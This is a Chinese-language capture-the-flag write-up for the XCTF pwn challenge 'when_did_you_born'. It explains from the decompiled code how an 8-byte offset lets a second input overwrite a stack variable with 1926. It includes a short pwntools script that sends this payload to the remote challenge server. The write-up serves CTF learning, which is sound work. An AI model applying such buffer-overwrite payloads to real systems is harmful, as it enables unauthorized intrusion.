XCTF - pwn when_did_you_born - WP
2020-02-03 04:37
274 查看
1.先拉进虚拟机运行一下
2.检查一下文件格式,发现是64位文件,然后这个文件开了 canary 和 Nx 保护,但是影响不大。
3.用 ida64 反编译查看一下,进入main函数。不难发现,当进入 else 分支后使得 v6 得 1926 即可得到 flag。
4.现在的问题是将第一次 v6 不得 1926 而第二次检查 v6 时却是 1926 。我们注意上面定义变量时,v5 的地址为 20h,v6 为 18h。因此我们可以构造 exp 来使用第二次输入来将 v6 覆盖为 1926。而其中两个变量的差值为 8.因此 payload 就能构造了。
5.
#!/usr/bin/env python from pwn import * # v5 - 20h # v6 - 18h #result = 1926 payload = 'aaaaaaaa' + str(p64(1926)) r = remote("111.198.29.45", 57262) r.recvuntil("Birth?") r.sendline("2000") r.recvuntil("Name?") r.sendline(payload) r.interactive()
6.运行脚本后得到 flag
转载于:https://www.cnblogs.com/Tsuiyields/p/11515377.html
- 点赞
- 收藏
- 分享
- 文章举报
相关文章推荐
- 攻防世界-pwn when_did_you_born(栈覆盖)
- pwn when_did_you_born
- CG CTF PWN When did you born?
- Unable to find the socket transport 'ssl' - did you forget to enable it when you configured
- Fixing “Did you mean to run dotnet SDK commands?” error when running dotnet –version
- Unable to find the socket transport 'ssl' - did you forget to enable it when you configured PHP?
- 【每天读一点英文:生而为赢Born to Win英文经典短文】gnuhpc注释版: When Love Beckons You 爱的召唤
- Unable to find the wrapper ”https” - did youforget to enable it when you configured PHP?
- Contention, poor performance, and deadlocks when you make Web service requests from ASP.NET applications
- When you install printer in Ubuntu, just need a ppd file.
- ccah-500 第40题 maintain your MRv1 TaskTracker slot capacities when you migrate. What should you do
- (Item 8) Override hashCode when you override equals()
- You Know You've Been on the Computer Too Long When...
- what-happens-when-you-change-weblogi-configuration
- When You Know-Hooverphonic, 芝华士广告歌完整版
- What really happens when you navigate to a URL
- Some words could be read when you upset(moved form other place)
- Error 1 error C2628: 'Solution' followed by 'int' is illegal (did you forget a ';'?) e:\
- Unknown type name "CGRect",did you mean "Rect"?的解决方案